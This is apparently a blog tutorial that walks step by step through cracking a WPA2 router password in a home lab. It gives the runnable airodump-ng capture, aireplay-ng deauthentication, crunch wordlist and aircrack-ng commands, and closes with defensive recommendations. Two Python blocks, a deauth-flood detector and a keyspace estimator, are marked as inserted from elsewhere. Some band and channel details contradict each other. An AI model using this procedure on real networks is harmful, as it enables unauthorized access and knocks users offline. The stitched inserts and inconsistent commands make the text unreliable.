How to Crack WPA2 WIFI Router Password

Frankline Misango
7 min read · Feb 1, 2023

Cover Image: Wifi logo. This article discusses the best wifi hacking method for WPA/WPA2-protected Wireless networks and how organisations can best protect their wireless networks. (Wikimedia Commons)

Disclaimer: This article is for educational purposes and seeks to promote ethical hacking and superior cybersecurity practices in organizations and private entities. It does not advocate for any malicious intent. Furthermore, all materials used in this tutorial are solely personal and intentionally set vulnerable. I, therefore, absolve myself from any future unauthorized scripting from parties reading this article that may compromise the integrity of respective wireless networks.

WPA/WPA2 WIFI hacking is one of the toughest exploits because of the time it takes and the cryptography skills needed. However, with dedication and commitment to learning, cracking them is a matter of minutes or even seconds, depending on the strength of the password. We will be cracking my router using my hacking lab setup today and exploring ways of strengthening WIFI so that companies and other entities stay safe on the web.

Introductory Theory of Literature

WPA/WPA2 networks can only be hacked using plain brute force since the secret key, unlike in WEP, is dynamic and changes over time (Kumkar et al., 2012).

Requirements

  • Kali Linux Separate OS /VMware Kali Linux
  • Windows PC / VMware Windows
  • External USB adapter (optional: the built-in NIC can be used)
  • A Wifi Router

Image 1 : Target Router; TPLink Wireless N router WR840N

Image 2: The hacking lab station. The laptop (the attacker) is fitted with a 600 Mbps dual-band 2.4G/5GHz 802.11AC wireless USB adapter dongle with antenna; the Windows desktop PC is the victim, running Windows 10 Pro with a dual-band 802.11AC USB adapter dongle with antenna. All devices are connected to my wifi network “Frank’s 306” with the password “myPYT12**”.

Procedure

  • Set the attacker's wireless USB WIFI dongle/NIC to monitor mode with root privileges (su), i.e.
  1. ifconfig wlan0 down → takes the interface down; it can be brought back up with ifconfig wlan0 up
  2. airmon-ng check kill → kills the networking services that would interfere; restart them later with systemctl restart network
  3. iwconfig wlan0 mode monitor → puts the NIC/external USB adapter into monitor mode
  • Run ifconfig to confirm that wlan0 shows the UNSPEC property, which indicates the NIC is ready for hacking (optional if the network icon already shows that networking services are down).
  • Capture the 2.4 GHz or 5 GHz network that you need to hack. In this case we are hacking my router, so “Frank’s 306” will be shown below. We will use the 5 GHz band (a short-range band typical of home networks) as it is faster. Either 5 GHz or 2.4 GHz can be used, but 5 GHz is recommended.

airodump-ng --band b wlan0 (you can use --band a as well)

  • Take note of the BSSID (MAC address of the router ), CH(channel) and ESSID(Wifi Name)

BSSID → 50:D4:F7:10:B4:88 , CH → 2 , ESSID → Frank’s 306

  • Open a new terminal, su it, then check who is connected to that WIFI router. This is the start of capturing the handshake: after we knock a client off the network, we record the handshake it performs when it logs back in and later match it against our own password list stored in a txt file. In this case, our Windows PC is connected and noted.

airodump-ng --bssid 50:D4:F7:10:B4:88 --channel 2 --write capturehandshake --band a wlan0 → creates a new capture file prefixed capturehandshake (ours was capturehandshake-01.cap, since capturehandshake previously existed) that stores the handshake results.

  • Take note of the victim/target devices connected to that network and write down their MAC addresses (STATION column). First, let us verify our Windows PC's MAC address with the following command in cmd, or by opening the REALTEK wireless tool. The MAC address in the STATION column from the previous step in Linux that matches the output from the Windows PC is 20:0D:B0:46:7E:00.

ipconfig /all → lists all the network adapters and their properties (the MAC address is the “Physical Address” field)

  • Open a new terminal, su it, then send the deauthentication packets to the victim. This disconnects them from the network, and the airodump-ng window captures the handshake when they re-attempt to log in. Observe the Windows PC disconnecting from and reconnecting to the WIFI.

aireplay-ng -0 0 -a 50:D4:F7:10:B4:88 -c 20:0D:B0:46:7E:00 wlan0 → forces deauthentication packets to the victim (-0 0 = deauthentication, unlimited count; -a = the WIFI BSSID of the router; -c = the MAC address of the victim PC; wlan0 = the monitor-mode interface)

  • Watch the airodump-ng window from the handshake-capture step for the router reconnections. You will receive a notification in the top right corner like “Handshake captured”. However, we noted that our Windows PC disconnected from the network and reattempted to connect. I connected manually. This also shows that the handshake has been captured, so redo the deauthentication attack with aireplay-ng if the victim doesn't disconnect and attempt to reconnect. You can also observe in the image below that our victim PC recorded the highest number of lost frames compared to its peers on the network, which shows that the attacking PC is actually sending “deauth” packets.

If the step is successful (you observed the Windows PC disconnecting and reconnecting, or reconnected it manually), go back to the aireplay-ng terminal from the previous step and press Ctrl+C to stop the deauthentication process.
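The “lost frames” observation above is exactly what a defender can alert on: a burst of deauthentication frames aimed at one client, apparently sent by the access point, is the signature of this step. The following Python example is added here and is not part of the article; it runs a sliding-window deauth-flood detector over a constructed capture summary (the frame list, the other client's MAC and the timings are made up for the example; the BSSID and victim MAC are the ones from the article). A wireless IDS such as Kismet raises the same kind of alert from live monitor-mode traffic.

```python
from collections import defaultdict, deque

# 802.11 frame control: type 0 is management; subtypes 10 and 12 are
# Disassociation and Deauthentication respectively.
MGMT = 0
DATA = 2
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

# Addresses taken from the article: the router's BSSID and the Windows client.
AP_BSSID = "50:D4:F7:10:B4:88"
VICTIM = "20:0D:B0:46:7E:00"
OTHER_CLIENT = "AA:BB:CC:DD:EE:01"  # constructed for this example, not from the article


def sample_frames():
    """Constructed capture summary: one dict per frame, sorted by timestamp.

    It mixes ordinary data frames, one legitimate deauth (a client that really
    left, reason code 3) and a burst of forged deauths aimed at the victim,
    which is what the attacking laptop in the article produces.
    """
    frames = [
        {"ts": 0.00, "type": DATA, "subtype": 0, "src": VICTIM, "dst": AP_BSSID, "reason": None},
        {"ts": 0.50, "type": MGMT, "subtype": SUBTYPE_DEAUTH, "src": AP_BSSID, "dst": OTHER_CLIENT, "reason": 3},
        {"ts": 0.75, "type": DATA, "subtype": 0, "src": AP_BSSID, "dst": VICTIM, "reason": None},
    ]
    # Ten forged deauths, 100 ms apart, claiming to come from the AP.
    for i in range(10):
        frames.append({"ts": round(1.0 + 0.1 * i, 2), "type": MGMT, "subtype": SUBTYPE_DEAUTH,
                       "src": AP_BSSID, "dst": VICTIM, "reason": 7})
    frames.append({"ts": 2.50, "type": DATA, "subtype": 0, "src": VICTIM, "dst": AP_BSSID, "reason": None})
    return frames


def detect_deauth_flood(frames, window_s=2.0, threshold=5):
    """Flag (src, dst) pairs that see >= threshold deauth/disassoc frames
    inside any window_s-second window.

    One alert is raised per pair, at the moment the threshold is crossed, so a
    live monitor could act on it immediately.
    """
    recent = defaultdict(deque)   # (src, dst) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for f in frames:
        if f["type"] != MGMT or f["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        key = (f["src"], f["dst"])
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window_s:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                "ap": f["src"],
                "client": f["dst"],
                "first_seen": q[0],
                "detected_at": f["ts"],
                "count": len(q),
                "reason": f["reason"],
            })
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_flood(sample_frames()):
        print(f"deauth flood: {a['count']} frames {a['ap']} -> {a['client']} "
              f"between t={a['first_seen']:.1f}s and t={a['detected_at']:.1f}s (reason {a['reason']})")
```

The single deauth to the other client never reaches the threshold, so only the burst against the victim is reported. Detection is the fallback; the fix is Protected Management Frames (802.11w), which WPA3 requires and most WPA2 access points can enable, because clients then discard deauthentication frames that are not cryptographically protected.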

  • Create a password dump file using crunch to try to match what has been recorded in the handshake file captured above. Our WIFI password for the sake of this tutorial is myPYT12**

crunch 9 9 (minimum and maximum length: nine, since our password is nine characters long) <charset> (the characters you want included at the guessed positions; in this tutorial we simply include the characters that make the prediction match the password, as in the command below) -t my@@@@@** (the guess template: here we assume our password starts with my and ends with a double **, which is technically true; adjust for your preference. Each @ is replaced by every character of the charset, so more @ symbols in the template mean a larger wordlist and a longer cracking time, and the reverse holds when more hints are placed in the template) -o wordlist (writes the candidates to a file called wordlist). The template must be exactly nine characters, matching the lengths given, and both the charset and the template are quoted so the shell does not treat the * as a glob. Final command below:

crunch 9 9 'myPYT12*' -t 'my@@@@@**' -o wordlist

  • Run the final command, which tests the wordlist generated in the previous step against the handshake .cap file. Give it some seconds or minutes, depending on how you configured the wordlist in the previous step.

aircrack-ng capturehandshake-01.cap -w wordlist

  • The password matched in 24 seconds in the previous step!
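To put the crunch template step and the 24-second result into perspective, here is an added Python example (not from the article) that counts how many candidates a crunch-style template expands to and how long exhausting them would take. The 1500 keys/s rate, the size of the symbol set for the ^ placeholder, and the assumption that a custom charset replaces the default set for @ (with duplicate characters counted once) are mine, not the article's; the template and charset in the first row are the ones from the crunch step above.

```python
# Charset sizes crunch substitutes for its template placeholders when no custom
# charset is given: '@' lower case, ',' upper case, '%' digits, '^' symbols.
# The symbol-set size (33) is an assumption for this example.
DEFAULT_PLACEHOLDERS = {"@": 26, ",": 26, "%": 10, "^": 33}

# Assumed crack rate: a few thousand WPA2 keys per second is typical for
# aircrack-ng on a laptop CPU; GPU crackers are orders of magnitude faster.
ASSUMED_KEYS_PER_SECOND = 1500

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def template_keyspace(template, custom_charset=None, placeholders=DEFAULT_PLACEHOLDERS):
    """Number of candidates a crunch-style template expands to.

    Literal characters contribute a factor of 1; each placeholder contributes
    the size of its charset. A custom charset (crunch's positional argument)
    replaces the '@' set, with duplicate characters counted once (assumption).
    """
    total = 1
    for ch in template:
        if ch == "@" and custom_charset is not None:
            total *= len(set(custom_charset))
        elif ch in placeholders:
            total *= placeholders[ch]
    return total


def seconds_to_exhaust(keyspace, keys_per_second=ASSUMED_KEYS_PER_SECOND):
    """Worst-case time to try every candidate at the given rate."""
    return keyspace / keys_per_second


def human_duration(seconds):
    """Render a duration in the largest convenient unit."""
    if seconds < 60:
        return f"{seconds:.1f} s"
    if seconds < 3600:
        return f"{seconds / 60:.1f} min"
    if seconds < 86400:
        return f"{seconds / 3600:.1f} h"
    if seconds < SECONDS_PER_YEAR:
        return f"{seconds / 86400:.1f} days"
    return f"{seconds / SECONDS_PER_YEAR:.1f} years"


def compare_templates():
    """Keyspace and worst-case time for the article's template versus templates with fewer hints."""
    cases = [
        ("my@@@@@**", "myPYT12*"),   # article: 'my' prefix, '**' suffix, 8-character charset
        ("my@@@@@**", None),         # same hints, but the default lower-case set for '@'
        ("@@@@@@@@@", None),         # no hints at all, lower case only
        ("%%%%%%%%%", None),         # nine-digit numeric passphrase, no hints
    ]
    rows = []
    for template, charset in cases:
        size = template_keyspace(template, charset)
        rows.append((template, charset, size, human_duration(seconds_to_exhaust(size))))
    return rows


if __name__ == "__main__":
    for template, charset, size, eta in compare_templates():
        print(f"{template:12} charset={charset or 'default':10} "
              f"candidates={size:>16,} worst case {eta}")
```

The first row reproduces the article's situation: 8^5 = 32,768 candidates, about 22 seconds at the assumed rate, which matches the 24 seconds observed. Dropping the charset hint alone turns that into hours, and dropping the prefix and suffix hints turns it into decades, which is the quantitative reason a leaked hint is as dangerous as a leaked password.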

Follow-up notes:

  • For better observation, open 3 terminals, su all of them at once and place them side by side so that you can watch for the airodump-ng “handshake captured” notification.
  • Always use an external WLAN card, as the internal NIC is sometimes slow and occupied with internal processes, e.g. background apps running on the network.
  • Update and upgrade Linux to make sure aircrack-ng is also up to date and to avoid lag → sudo apt-get update && sudo apt-get upgrade
  • Learn more about aircrack-ng by typing man aircrack-ng or reading on the web.

Recommendations

  • Organizations can mandate the use of wired LAN, with the MAC address of each PC registered for use, to reduce wireless attacks from external observers. In case of an attack, the compromised host is easier to identify.
  • Use WPA2-Enterprise protection, which lets users in the company log into the WIFI with their intranet credentials. Such networks require more effort to hack.
  • Encourage safe password practices among employees, for instance never posting passwords (or even password hints) online or leaving them carelessly on desks where an external observer can easily see them. As demonstrated, aircrack-ng only needs hints to determine the password.

References (recommended for further reading )

Kumkar, V., Shrawne, S., Tiwari, A., Tiwari, P., & Gupta, A. (2012). Vulnerabilities of Wireless Security Protocols (WEP and WPA2). International Journal of Advanced Research in Computer Engineering & Technology, 1(2).
